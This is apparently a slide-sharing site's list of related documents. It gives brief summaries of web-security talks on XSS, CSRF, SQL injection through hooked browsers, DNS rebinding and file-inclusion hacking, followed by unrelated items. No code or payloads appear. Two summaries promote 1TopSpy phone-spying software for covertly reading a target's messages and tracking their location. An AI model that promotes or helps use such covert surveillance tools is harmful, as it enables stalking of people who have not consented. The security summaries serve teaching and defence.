Secure Sky Technology Inc, Technical Adviser. Known for finding numerous vulnerablities in Internet Explorer、Mozilla Firefox and other web applications.He has also presented at Black Hat Japan 2008, South Korea POC 2008, 2010 and others.
OWASP Kansai Chapter Leader, OWASP Japan Board member.
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
Demonstration based session on HTTP headers relevant to security aspect of web applications. Target audience is web developers, and more attention is given to Java language.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
Protecting Java EE Web Apps with Secure HTTP Headers (Frank Kim)
This document summarizes techniques for securing Java EE web applications with secure HTTP headers. It discusses cross-site scripting (XSS) and how to prevent it using the HttpOnly and X-XSS-Protection headers. It also covers session hijacking and how to prevent it with the Secure and Strict-Transport-Security headers. Finally, it discusses clickjacking and demonstrates how it works.
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
This document discusses security considerations for using UIWebView on iOS. It recommends only loading trusted content, implementing input validation, and using features like Content Security Policy (CSP) to mitigate risks like cross-site scripting (XSS). The document provides code examples for implementing CSP and filtering untrusted content. It also warns that JavaScript bridges between UIWebView and native code need special attention from a security perspective.
Slides of my talk at RuxCon 2013:
For those who do not listen to Mayhem and black metal, the talk title might seem a bit weird, and I can't blame you.
You know the boundaries of the Same Origin Policy, you know SQL injection and time-delays, you know BeEF. You also know that when sending cross-domain XHRs you can still monitor the timing of the response: you might want to infer 0 or 1 bits depending on whether the response was delayed or not.
This means it's possible to exploit every kind of SQL injection, blind or not blind, through a hooked browser, if you can inject a time-delay and monitor the response timing. You don't need a 0day or a particular SOP bypass to do this, and it works in every browser.
The potential of being faster than a normal single-host multi-threaded SQLi dumper will be explored. Two experiments will be shown: WebWorkers as well as multiple synched hooked browsers, which split the workload, communicating partial results to a central server.
A pure JavaScript approach will be exclusively presented during this talk, including live demos. Such an approach would work for both internet-facing targets as well as applications available in the intranet of the hooked browser.
The talk will finish discussing the implications of such an approach in terms of Incident Response and Forensics, showing evidence of a very small footprint.
This document discusses various tools from the OWASP project for securing modern web applications, including ESAPI and the Java Encoder for output encoding, the Secure Headers Project for response headers, and CSRFGuard for cross-site request forgery protection. It emphasizes using security features like content security policies, strict transport security, and X-frame options headers to help mitigate risks like cross-site scripting and clickjacking attacks. The document also demonstrates cross-site request forgery vulnerabilities using the OWASP 1-Liner application and how to address them with anti-CSRF tokens.
This document discusses DNS rebinding attacks and defenses against them. DNS rebinding works by resolving a domain name to the attacker's IP address for a short time, then rebinding it to the target's IP. This allows the attacker to circumvent the same-origin policy and run code on the target's machine. Experiments showed the attack could recruit over 30,000 browsers to a botnet without any user interaction using Flash. Defenses include smarter pinning in browsers, host name authorization, and policy-based approaches. Plug-ins also need to consult server policies before opening sockets.
XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more.
This presentation will:
1. Explain how XPC/NSXPC work
2. Present you some of my findings in popular macOS apps (e.g. local privilege escalation to r00t)
3. Abuse an interesting feature on Catalina that allows injecting an unsigned dylib
4. Show you how to fix that vulnz finally!
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
This document discusses security challenges with web applications that combine content from multiple sources (mashups). It covers how the same-origin policy isolates origins but exempts scripts, allowing cross-site scripting attacks. Frame-based communication and the postMessage API provide secure cross-origin messaging capabilities. The document recommends sandboxing iframes and using features like CORS to mitigate risks in mashups.
The WhiteHat Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address to avert attack. WhiteHat has been publishing the report, which highlights the top ten vulnerabilities, vertical market trends and new attack vectors, since 2006.
The WhiteHat report presents a statistical picture of current website vulnerabilities, accompanied by WhiteHat expert analysis and recommendations. WhiteHat’s report is the only one in the industry to focus solely on unknown vulnerabilities in custom Web applications, code unique to an organization, within real-world websites.
This document provides instructions for exploiting various web application vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), SQL injection, and more. It begins by explaining RFI and how to exploit it, including using a null byte bypass. It then covers LFI and how to escalate it to remote code execution (RCE). Other sections discuss uploading shells via LFI and Firefox, exploiting vulnerabilities to download local files, full path disclosure, SQL injection techniques, and automatically uploading a shell via a phpThumb() command injection vulnerability. The document aims to serve as a tutorial for hackers to learn various web hacking methods.
This document discusses HTML5 web messaging and the same origin policy. It introduces the MessageEvent object used to handle cross-document messaging and describes how to use the postMessage() method and MessageChannel interface to communicate across browsing contexts from different origins securely. Examples are given of using web messaging to extend the browser's capabilities by communicating between injected scripts, pages, and background processes.
Security Risk Management: or how to mitigate and manage data risks th... (festival ICT 2016)
Security Risk Management: or how to mitigate and manage data risks through managed services. - by Hitachi Systems - festival ICT 2015
Speaker: Denis Cassinerio
Security Business Unit Director at Hitachi Systems CBT
The document discusses various web application attacks like cross-site scripting, SQL injection, cross-site request forgery, sensitive data exposure, and cookie editing. For each attack, it provides information on threat agents, attack vectors, security weaknesses, impacts, prevalence, detectability, example exploits, and steps to prevent the attack. The overall document serves as an educational guide on common web hacking techniques and how to avoid falling victim to them.
This document discusses security issues related to Flash applications and cross-domain access. It covers how the crossdomain.xml file controls cross-domain access and demonstrates how this can be exploited. Attack surfaces like global parameters, external resources, and HTML text areas are described. The document recommends limiting JavaScript access in embedded Flash, ensuring configurations and external resources come from trusted domains, and sanitizing data in HTML text areas.
- The document summarizes a study of flash crowd dynamics in a peer-to-peer live video streaming system called Coolstreaming. It analyzes data collected during a flash crowd event when tens of thousands joined simultaneously.
- It finds the number of short sessions (under 2 minutes) increases significantly during a flash crowd, correlated with high joining rates. This suggests new peers struggle to start playback due to limited resources.
- User retry behavior is also analyzed, showing users try multiple times to join during a flash crowd. The system can scale up to a limit but with longer startup delays and potential disruptions during flash crowds.
The document discusses vulnerabilities in Adobe Flash and the risk of exploitation. It provides a history of Flash exploits from 2001-2008, noting common bugs like file format validation issues and input validation errors. It analyzes trends in Flash security advisories, finding that almost half of vulnerabilities allow remote code execution. The document warns that a Flash virus or worm is inevitable given the widespread use of Flash and continued emergence of vulnerabilities.
The document describes the control and error messages of the TCP/IP protocol suite. It explains that the ICMP protocol is used to send error and control messages between network devices, since IP by itself neither guarantees packet delivery nor provides error notifications. It also describes various types of ICMP messages, such as echo, redirect, timestamp and destination unreachable, as well as their uses for diagnosing communication problems in IP networks.
This document introduces Proxenet, a hacker-friendly web application proxy designed to be easily extensible through plugins. Proxenet is written entirely in C for high performance. It uses a microkernel approach where a small core handles connections and delegates all other functionality to plugins. Plugins are simple to create, requiring only request and response hook functions. The document demonstrates how Proxenet can be used for man-in-the-middle attacks by modifying HTTP traffic using plugins during active directory poisoning attacks on internal networks.
This document defines computer viruses and describes their characteristics, effects and classifications. Viruses are harmful programs that hide themselves, spread and infect other computers. They can consume resources, reduce performance and destroy information. There are several types, such as Trojan horses, chameleons, polymorphic viruses and worms. Viruses are created by hackers to cause damage. Using antivirus software and not running suspicious files is recommended to prevent infections.
The top 10 security issues in web applications (Devnology)
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
The document introduces the concepts of malware and computer viruses, describing their characteristics, classifications, means of propagation and damage. It explains virus types such as boot sector, file, macro and encrypted viruses, as well as their symptoms and stages of infection. Finally, it recommends protective measures such as antivirus software, firewalls and the implementation of security policies.
This document advertises 1TopSpy cell phone tracking software and describes its features for hacking into phones and monitoring activity. It claims the software can track location, read texts, messages on apps like WhatsApp and Facebook, and more across millions of phones. The summary provides instructions to download the software onto a target phone, login on a computer, and begin monitoring. Customer testimonials praise the software's usefulness for parenting and employee monitoring.
Information security seeks to protect the assets of a company or individual, such as information, equipment and people, by safeguarding the principles of integrity, confidentiality and availability of information. This is achieved by identifying threats and vulnerabilities and applying security measures such as risk analysis and security policies.
Open Source Information Gathering Brucon Edition (Chris Gates)
This document provides information on open source intelligence (OSINT) techniques for information gathering. It discusses performing passive, semi-passive, and active information gathering. Key areas of focus are infrastructure intelligence gathering to identify networks and domains, and people/organization intelligence gathering to find emails, metadata in documents, and profiles of employees. A variety of tools are recommended to automate the process, including Maltego, theHarvester, FOCA, and APIs from services like Zoominfo.
This document describes how to use 1TopSpy software to hack and track any mobile phone within 5 minutes. It lists the features of 1TopSpy including tracking GPS location, monitoring text messages, calls, WhatsApp messages, and more. The summary describes downloading and installing 1TopSpy on the target phone, logging into the 1TopSpy website to begin monitoring. Customer testimonials praise 1TopSpy for allowing worried parents and businesses to discreetly monitor mobile activity.
Devfest istanbul'14 - Web Application Attacks and Trusting Frameworks (Mehmet Ince)
Frameworks are undeniably one of the most important elements of frameworks. As we continue to witness a significant increase in the number of framework-based attacks on web applications each day, the use of frameworks without considering security-related aspects continues to be the most drastic problem that developers face. Throughout the presentation, Mr. İnce will analyze one of the most commonly used PHP web frameworks, highlighting important security considerations, followed by a real-time exploitation of a discovered vulnerability in a LAB environment.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, he will cover the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Rich Web App Security - Keeping your application safe (Jeremiah Grossman)
The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
Cross-Site Request Forgery (CSRF) is a major web vulnerability that forces users to perform unintended actions on websites. It remains underreported due to the difficulty of detection. CSRF can be used to hijack user accounts, modify browser settings, and force purchases without user awareness or consent. While solutions like tokens exist, many websites remain vulnerable to CSRF attacks.
I took pictures from here and there by googling, not mentioning all sources; please let me know if anyone has any objection. This presentation was presented at the “securITy” Information Security Conference at BASIS SoftExpo 2012.
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
Cross-Site Request Forgery (CSRF) is a type of malicious attack that tricks a user into unknowingly executing unwanted actions on a web application. The attacker creates hidden HTTP requests that get executed in the victim's browser using their authentication credentials. This allows the attacker to perform sensitive functions like changing passwords, making purchases, or posting comments on the victim's behalf. Defenses include using secret tokens or custom headers to validate requests and prevent CSRF attacks. The Firefox add-on CsFire also helps protect users by removing authentication information from cross-domain requests.
1) The document discusses new hacking techniques that can exploit browsers and access internal corporate networks even when the browser has JavaScript disabled or restricted. These techniques bypass traditional perimeter security measures.
2) One technique uses CSS to steal a user's browsing history without JavaScript. Another obtains the user's internal IP address using a Java applet and then port scans the internal network to find vulnerabilities.
3) The author concludes that a user's browser, when visiting public websites, can potentially be silently hijacked to target and hack resources on the internal corporate network.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.
Renaud Bido & Mohammad Shams - Hijacking web servers & clients (nooralmousa)
The document discusses threats from hijacking web servers and clients, including keyloggers, browser compromise, cross-site scripting (XSS) attacks, and real-world examples of XSS exploitation. It also provides an overview of DenyAll, a French web application firewall vendor, including their clients, partners, and global presence.
The document discusses web application security vulnerabilities and countermeasures. It begins with definitions of web applications and websites. It then outlines common vulnerabilities like misconfiguration, client-side issues, authentication errors, cross-site scripting, SQL injection, and cross-site request forgery. For each vulnerability, it provides details on how attacks work and potential consequences. It also discusses defenses and tools to mitigate risks.
Website hacking and prevention (All Tools, Topics & Techniques) (Jay Nagar)
This document discusses the Heartbleed vulnerability in OpenSSL and its potential impacts. Heartbleed is a bug in the OpenSSL cryptography library that exposes the contents of the server's memory, including private keys and user session cookies. An attacker can exploit Heartbleed to steal sensitive data from vulnerable servers or impersonate services. The vulnerability had widespread implications because OpenSSL is used to secure a majority of websites. While patching servers and changing passwords addressed direct theft of information, Heartbleed also weakened the security of encrypted communications and online identities.
Owasp Top 10 - Owasp Pune Chapter - January 2008 (abhijitapatil)
The document discusses various cybersecurity topics including vulnerabilities, threats, attacks, and countermeasures. It provides an overview of the Open Web Application Security Project (OWASP) which focuses on improving application security. It also summarizes common web vulnerabilities like cross-site scripting (XSS), SQL injection, buffer overflows, and cross-site request forgery (CSRF). Recommendations are given to prevent these vulnerabilities.
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek (Magno Logan)
The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.
The document discusses a new web security technique called cross-site tracing (XST) that can bypass the HTTP-only security feature in Internet Explorer 6 SP1 and perform cross-site scripting attacks. XST exploits the TRACE HTTP request method, which echoes request information to the client, to obtain authentication cookies from other domains over HTTP and HTTPS. While HTTP-only helps prevent cookie access via JavaScript, XST can still access cookies through TRACE requests.
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos (PROIDEA)
Speakers: Matt Johansen, Johnathan Kuskos
Language: English
Every year the security community produces a stunning number of new Web hacking techniques. Now in its 9th year, the Top 10 Web Hacking Techniques list encourages information and knowledge sharing and recognizes researchers who contribute excellent work. In this talk, we will do a technical deep dive and take you through the Top 10 Web Hacks of 2014, as picked by an expert panel of judges. The full list is available here: https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/
CONFidence: http://confidence.org.pl/pl/
The document discusses cross-site scripting (XSS) vulnerabilities. It defines XSS as allowing malicious scripts to be served to users from a vulnerable website. There are different types of XSS vulnerabilities including those without storage and with storage of malicious scripts on the website. The document provides examples of XSS vulnerabilities and discusses how they can be used to steal user credentials and track users. It also outlines challenges in preventing XSS vulnerabilities.
Similar to Top Ten Web Hacking Techniques (2010)
There is a serious misalignment of interests between Application Security vulnerability assessment vendors and their customers. Vendors are incentivized to report everything they possibly can, even issues that rarely matter. On the other hand, customers just want the vulnerability reports that are likely to get them hacked. Every finding beyond that is a waste of time, money, and energy, which is precisely what’s happening every day.
How to Determine Your Attack Surface in the Healthcare Sector (Jeremiah Grossman)
This document provides an analysis of the attack surface for 19 major healthcare organizations based on data collected by Bit Discovery from public sources on the internet. It includes statistics on each organization's total assets, domain names, cloud assets, use of content delivery networks, certificate authorities, expired certificates, geographic distribution, private IP addresses, WordPress vulnerabilities, and recommendations for building a security program around mapping the attack surface.
Exploring the Psychological Mechanisms used in Ransomware Splash Screens (Jeremiah Grossman)
The present study examined a selection of 76 ransomware splash screens collected from a variety of sources. These splash screens were analysed according to surface information, including aspects of visual appearance, the use of language, cultural icons, payment and payment types. The results from the current study showed that, whilst there was a wide variation in the construction of ransomware splash screens, there was a good degree of commonality, particularly in terms of the structure and use of key aspects of social engineering used to elicit payment from the victims. There was the emergence of a sub-set of ransomware that, in the context of this report, was termed ‘Cuckoo’ ransomware. This type of attack often purported to be from an official source requesting payment for alleged transgressions.
What the Kidnapping & Ransom Economy Teaches Us About Ransomware (Jeremiah Grossman)
Ransomware is center stage, as campaigns are practically guaranteed financial gain. Cyber-criminals profit hundreds of millions of dollars by selling our data back to us. If you look closely, the ransomware economic dynamics closely follow the real-world kidnapping and ransom industry. We’ll explore the eerie similarities, where ransomware is headed, and strategies we can bring to the fight.
This document provides an overview and buyer's guide for next generation endpoint protection (NGEP). It discusses the limitations of traditional antivirus software and the evolving threat landscape. A new behavior-based approach using NGEP is presented as a solution. Key criteria for evaluating NGEP vendors are outlined, including the critical capabilities an effective solution should provide. SentinelOne is presented as an NGEP option, highlighting its behavior monitoring approach and ability to detect, prevent, and remediate both known and unknown threats.
Ransomware is Here: Fundamentals Everyone Needs to Know (Jeremiah Grossman)
If you’re an IT professional, you probably know at least the basics of ransomware. Instead of using malware or an exploit to exfiltrate PII from an enterprise, bad actors instead find valuable data and encrypt it. Unless you happen to have an NSA-caliber data center at your disposal to break the encryption, you must pay your attacker in cold, hard bitcoins—or else wave goodbye to your PII. Those assumptions aren’t wrong, but they also don’t tell the whole picture.
During this event we’ll discuss topics such as:
Why Ransomware is Exploding
The growth of ransomware, as opposed to garden-variety malware, is enormous. Hackers have found that they can directly monetize the data they encrypt, which eliminates the time-consuming process of selling stolen data on the Darknet. In addition, the use of ransomware requires little in the way of technical skill—because attackers don’t need to get root on a victim’s machine.
Who the Real Targets Are
Two years ago, the most newsworthy victims of ransomware were various police departments. This year, everyone is buzzing about hospitals. Is this a deliberate pattern? Probably not. Enterprises are so ill-prepared for ransomware that attackers have a green field to wreak havoc. Until the industry shapes up, bad actors will target ransomware indiscriminately.
Where Ransomware Stumbles
Although ransomware is nearly impossible to dislodge when employed correctly, you may be surprised to find that not all bad actors have the skill to do it. Even if ransomware targets your network, you may learn that your attackers have used extremely weak encryption—or that they’ve encrypted files that are entirely non-critical.
As far as ransomware is concerned, forewarned is forearmed. Once you know how attackers deliver ransomware, who they’re likely to attack, and the weaknesses in the ransomware deployment model, you’ll be able to understand how to protect your enterprise.
This year WhiteHat Security™ celebrates its fifteenth anniversary, and the eleventh year that we have produced the Web Applications Security Statistics Report. The stats shared in this report are based on the aggregation of all the scanning and remediation data obtained from applications that used the WhiteHat Sentinel™ service for application security testing in 2015. As an early pioneer in the Application Security Market, WhiteHat has a large and unique collection of data to work with.
15 Years of Web Security: The Rebellious Teenage Years (Jeremiah Grossman)
Jeremiah Grossman is the founder of WhiteHat Security, a company that helps secure websites by finding vulnerabilities in source code and production and helping companies fix them. Organized crime has become the most frequent threat actor for web app attacks according to Verizon. Many websites remain vulnerable for long periods, with 60% of retail sites always vulnerable. Compliance is the top priority for resolving vulnerabilities according to 15% of respondents, while risk reduction is the top priority for 35% of respondents.
15 Years of Web Security: The Rebellious Teenage Years (Jeremiah Grossman)
This document summarizes Jeremiah Grossman's 15 years of experience in web security and the state of application security. It discusses threat actors targeting websites, the growing costs of data breaches and cyber insurance, challenges with vulnerability remediation, and the need for more effective software development processes and addressing skill shortages. WhiteHat Security helps companies find and fix application vulnerabilities before exploits.
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015) (Jeremiah Grossman)
WhiteHat Security’s Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address in order to conduct business online safely.
Website security is an ever-moving target. New website launches are common, new code is released constantly, new web technologies are created and adopted every day; as a result, new attack techniques are frequently disclosed that can put every online business at risk. In order to stay protected, enterprises must receive timely information about how they can most efficiently defend their websites, gain visibility into the performance of their security programs, and learn how they compare with their industry peers. Obtaining these insights is crucial in order to stay ahead and truly improve enterprise website security.
To help, WhiteHat Security has been publishing its Website Security Statistics Report since 2006. This report is the only one that focuses exclusively on unknown vulnerabilities in custom web applications, code that is unique to an organization, and found in real-world websites. The underlying data is hundreds of terabytes in size, comprises vulnerability assessment results from tens of thousands of websites across hundreds of the most well-known organizations, and collectively represents the largest and most accurate picture of website security available. Inside this report is information about the most prevalent vulnerabilities, how many get fixed, how long the fixes can take on average, and how every application security program may measurably improve. The report is organized by industry, and is accompanied by WhiteHat Security’s expert analysis and recommendations.
This document is a website security statistics report from 2015 that analyzes vulnerability data from tens of thousands of websites. Some of the key findings include:
- Compliance-driven organizations have the lowest average number of vulnerabilities but the highest remediation rates, while risk reduction-driven organizations have more vulnerabilities but fix them faster.
- Feeding vulnerability results back to development teams significantly reduces vulnerabilities, speeds up fixes, and increases remediation rates.
- Performing static code analysis more frequently is correlated with faster vulnerability fix times.
- Ad hoc code reviews of high-risk applications appear to be one of the most effective activities at reducing vulnerabilities.
- There is no clear evidence that any particular "best practice"
No More Snake Oil: Why InfoSec Needs Security Guarantees (Jeremiah Grossman)
Ever notice how everything in InfoSec is sold “as is”? No guarantees, no warranties, no return policies. For some reason in InfoSec, providing customers with a form of financial coverage for their investment is seen as gimmicky, but the tides and times are changing. This talk discusses use cases on why guarantees are a must-have and how guarantees benefit customers as well as InfoSec as a whole.
In this report, we put this area of application security understanding to the test by measuring how various web programming languages and development frameworks actually perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that the most popular modern languages and frameworks yield similar results in production websites?
By analyzing the vulnerability assessment results of more than 30,000 websites under management with WhiteHat Sentinel, we begin to answer these questions. These answers may enable the application security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas. Software vendors may focus on areas that are found to be lacking. Developers can increase their familiarity with the strengths and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and must be virtually transparent. Only then will application security progress be made.
http://blackhat.com/us-13/briefings.html#Grossman
Online advertising networks can be a web hacker’s best friend. For mere pennies per thousand impressions (that means browsers) there are service providers who allow you to broadly distribute arbitrary javascript -- even malicious javascript! You are SUPPOSED to use this “feature” to show ads, to track users, and get clicks, but that doesn’t mean you have to abide. Absolutely nothing prevents spending $10, $100, or more to create a massive javascript-driven browser botnet instantly. The real-world power is spooky cool. We know, because we tested it… in-the-wild.
With a few lines of HTML5 and javascript code we’ll demonstrate just how you can easily commandeer browsers to perform DDoS attacks, participate in email spam campaigns, crack hashes and even help brute-force passwords. Put simply, instruct browsers to make HTTP requests they didn’t intend, even something as well-known as Cross-Site Request Forgery. With CSRF, no zero-days or malware is required. Oh, and there is no patch. The Web is supposed to work this way. Also nice, when the user leaves the page, our code vanishes. No traces. No tracks.
Before leveraging advertising networks, the reason this attack scenario didn’t worry many people is because it has always been difficult to scale up, which is to say, simultaneously control enough browsers (aka botnets) to reach critical mass. Previously, web hackers tried poisoning search engine results, phishing users via email, link spamming Facebook, Twitter and instant messages, Cross-Site Scripting attacks, publishing rigged open proxies, and malicious browser plugins. While all useful methods in certain scenarios, they lack simplicity, invisibility, and most importantly -- scale. That’s what we want! At a moment’s notice, we will show how it is possible to run javascript on an impressively large number of browsers all at once and no one will be the wiser. Today this is possible, and practical.
Through its Software-as-a-Service (SaaS) offering, WhiteHat Sentinel, WhiteHat Security is uniquely positioned to deliver the depth of knowledge that organizations require to protect their brands, attain compliance, and avert costly breaches.
This document summarizes the key findings from the WhiteHat Security Website Security Statistics Report from June 2012. The report analyzed vulnerabilities across 7,000 websites from hundreds of organizations. Some of the main findings include:
- The average number of serious vulnerabilities per website dropped significantly from 230 in 2010 to 79 in 2011.
- Cross-site scripting remained the most prevalent vulnerability, found in 55% of websites.
- Web application firewalls could have mitigated 71% of custom application vulnerabilities.
- Banking websites had the fewest vulnerabilities on average with 17 per site.
- Overall, organizations fixed 63% of serious vulnerabilities, up from 53% the prior year.
Quality Patents: Patents That Stand the Test of Time (Aurora Consulting)
Is your patent a vanity piece of paper for your office wall? Or is it a reliable, defendable, assertable, property right? The difference is often quality.
Is your patent simply a transactional cost and a large pile of legal bills for your startup? Or is it a leverageable asset worthy of attracting precious investment dollars, worth its cost in multiples of valuation? The difference is often quality.
Is your patent application only good enough to get through the examination process? Or has it been crafted to stand the tests of time and varied audiences if you later need to assert that document against an infringer, find yourself litigating with it in an Article 3 Court at the hands of a judge and jury, God forbid, end up having to defend its validity at the PTAB, or even needing to use it to block pirated imports at the International Trade Commission? The difference is often quality.
Quality will be our focus for a good chunk of the remainder of this season. What goes into a quality patent, and where possible, how do you get it without breaking the bank?
** Episode Overview **
In this first episode of our quality series, Kristen Hansen and the panel discuss:
⦿ What do we mean when we say patent quality?
⦿ Why is patent quality important?
⦿ How to balance quality and budget
⦿ The importance of searching, continuations, and draftsperson domain expertise
⦿ Very practical tips, tricks, examples, and Kristen’s Musts for drafting quality applications
https://www.aurorapatents.com/patently-strategic-podcast.html
How Social Media Hackers Help You to See Your Wife's Message.pdf (HackersList)
In the modern digital era, social media platforms have become integral to our daily lives. These platforms, including Facebook, Instagram, WhatsApp, and Snapchat, offer countless ways to connect, share, and communicate.
7 Most Powerful Solar Storms in the History of Earth.pdf (Enterprise Wired)
Solar Storms (Geo Magnetic Storms) are the motion of accelerated charged particles in the solar environment with high velocities due to the coronal mass ejection (CME).
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In (TrustArc)
Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
Implementations of Fused Deposition Modeling in real world (Emerging Tech)
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5-10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
